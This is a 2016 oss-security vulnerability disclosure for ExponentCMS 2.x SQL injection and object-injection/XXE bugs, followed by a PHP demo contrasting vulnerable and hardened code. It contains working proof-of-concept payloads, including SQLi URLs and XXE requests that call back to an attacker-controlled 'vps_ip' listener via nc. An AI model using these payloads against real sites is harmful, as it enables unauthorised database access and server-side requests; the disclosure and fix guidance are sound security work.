|
Message-ID: <CAEiFw0WzL4iVgrZYJsoizHbX8_s+tgGc4xJDnYgr1y4SVv=UrA@mail.gmail.com>
Date: Fri, 30 Sep 2016 12:22:38 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities

hello,

I reported the following vulnerabilities to the ExponentCMS team some days ago, and they have now been fixed.

1) sqli-1

/framework/modules/ecommerce/controllers/cartController.php lines 61 - 66:

```
$product_type = isset($this->params['product_type']) ? $this->params['product_type'] : 'product';
$product = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children'])) $c = $product->find('first', 'parent_id=' . $this->params['product_id']); //sqli
if (!empty($c->id)) {
    flash('message', gt("Please select a product and quantity from the options listed below to add to your cart."));
    redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=> $this->params['product_id']));
}
```

The "product_id" parameter is not filtered; we can input "product_id=sqli" to execute SQL statements.

Proof of concept:

/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2

/framework/modules/help/controllers/helpController.php lines 122 - 131:

```
if (empty($this->params['version']) || $this->params['version'] == 'current') {
    $version_id = help_version::getCurrentHelpVersionId();
} else {
    $version_id = help_version::getHelpVersionId($this->params['version']); //sqli
    if (empty($version_id)) {
        $version_id = help_version::getCurrentHelpVersionId();
    }
}
$doc = $help->find('first', 'help_version_id='.$version_id.' AND sef_url="'.$this->params['title'].'"'); //sqli
$children = $help->find('count','parent='.$doc->id);
```

The "version" and "title" parameters are not filtered; we can input "version=sqli" or "title=sqli" to execute SQL statements.

Proof of concept:

/index.php?controller=help&action=show&version=1" union select 1%23&title=aaa" union select 1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1

/framework/modules/core/controllers/expTagController.php#L228-L232

```
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```

Proof of concept (XXE):

[ We could use the PHP class "SimpleXMLElement" ( http://cn2.php.net/manual/en/simplexmlelement.construct.php ) to exploit it ]

step 1: VPS listening (nc -lvvp 8080)

step 2: /index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

4) Object Injection -2

/framework/modules/core/controllers/expCatController.php#L175-L182

```
if (!empty($this->params['change_cat'])) {
    foreach ($this->params['change_cat'] as $item) {
        $classname = $this->params['mod'];
        $object = new $classname($item);
        $params['expCat'][0] = $this->params['newcat'];
        $object->update($params);
    }
}
```

Proof of concept (XXE):

[ We could use the PHP class "SimpleXMLElement" ( http://cn2.php.net/manual/en/simplexmlelement.construct.php ) to exploit it ]

step 1: VPS listening (nc -lvvp 8080)

step 2: /index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

```
[root@...ud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080
```

And now, all vulnerabilities have been fixed.

https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

These issues were reported by Peng Hua of silence.com.cn Inc., and I would like to request CVEs for these issues (if not done so).

-------------------
http://www.silence.com.cn/
penghua@...ence.com.cn
PKAV Team
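The two bug classes in the report side by side, as an added example that is not part of the e-mail and not ExponentCMS code (the linked commits are the project's actual fix; this block only illustrates the shapes). It assumes the PHP CLI with the pdo_sqlite extension; the `help` table, its rows, the stub `product`/`help` model classes and the `TAGGABLE_MODELS` map are constructed for the demo. The UNION payload is the same idea as the `title` proof of concept above, adapted to SQLite (four columns, `--` comment instead of `%23`), and the rejected XML string is the decoded `change_tag[]` payload.

```php
<?php
// Added example, not ExponentCMS code: vulnerable shape beside a hardened shape for
// both bug classes in the report. Runs with `php this_file.php` (needs pdo_sqlite).
// The table, rows, model classes and allow-list below are constructed for the demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE help (id INTEGER PRIMARY KEY, help_version_id INTEGER, sef_url TEXT, body TEXT)');
$db->exec("INSERT INTO help VALUES (1, 1, 'getting-started', 'public doc'),
                                   (2, 2, 'internal-notes',  'unreleased doc')");

// --- SQLi: the helpController shape, request values concatenated into the WHERE clause.
function findHelpVulnerable(PDO $db, string $versionId, string $title): array
{
    $sql = 'SELECT * FROM help WHERE help_version_id=' . $versionId . ' AND sef_url="' . $title . '"';
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the numeric id is cast, the string is bound, so a quote in $title is only data.
function findHelpSafe(PDO $db, string $versionId, string $title): array
{
    $stmt = $db->prepare('SELECT * FROM help WHERE help_version_id = :v AND sef_url = :t');
    $stmt->execute([':v' => (int) $versionId, ':t' => $title]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same trick as the post's `title` PoC: close the quote, tack on a UNION, comment out the rest.
// Column count matched to this 4-column table; `--` replaces MySQL's `#` for SQLite.
$unionTitle = 'aaa" UNION SELECT 1, 1, \'injected\', \'attacker-controlled row\' -- ';
echo "vulnerable: ", json_encode(findHelpVulnerable($db, '1', $unionTitle)), "\n"; // injected row comes back
echo "safe:       ", json_encode(findHelpSafe($db, '1', $unionTitle)), "\n";       // [] (no such sef_url)

// --- Object injection: expTagController/expCatController do `new $this->params['mod']($item)`,
// so `mod=SimpleXMLElement` turns the constructor into an XML parser fed with `$item`.
class product { public $id; public function __construct(int $id) { $this->id = $id; } }
class help    { public $id; public function __construct(int $id) { $this->id = $id; } }

// Hardened: the request may only *name* a model; the class comes from a fixed map
// (assumed list for the demo) and the id is coerced to an integer before the constructor runs.
const TAGGABLE_MODELS = ['product' => 'product', 'help' => 'help'];

function instantiateModel(string $mod, $item): object
{
    if (!array_key_exists($mod, TAGGABLE_MODELS)) {
        throw new InvalidArgumentException("model '$mod' is not taggable");
    }
    $class = TAGGABLE_MODELS[$mod];
    return new $class((int) $item);
}

// Decoded form of the report's change_tag[] payload: a parameter entity pointing at the listener.
$xxe = '<!DOCTYPE root [<!ENTITY % remote SYSTEM "http://vps_ip:8080/xxe_exists"> %remote;]><root/>';

echo get_class(instantiateModel('product', '42')), "\n";   // product
try {
    instantiateModel('SimpleXMLElement', $xxe);            // refused before any XML is parsed
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Two practical caveats when reading the output: the vulnerable query returns the injected row only because SQLite falls back to treating an unknown double-quoted name (`"aaa"`) as a string literal, the same lenient quoting the original `sef_url="..."` concatenation relies on in MySQL; and the allow-list works because the key comes from the request while the class name never does, which is the property a fix for `new $classname($item)` has to guarantee regardless of how the model map is populated.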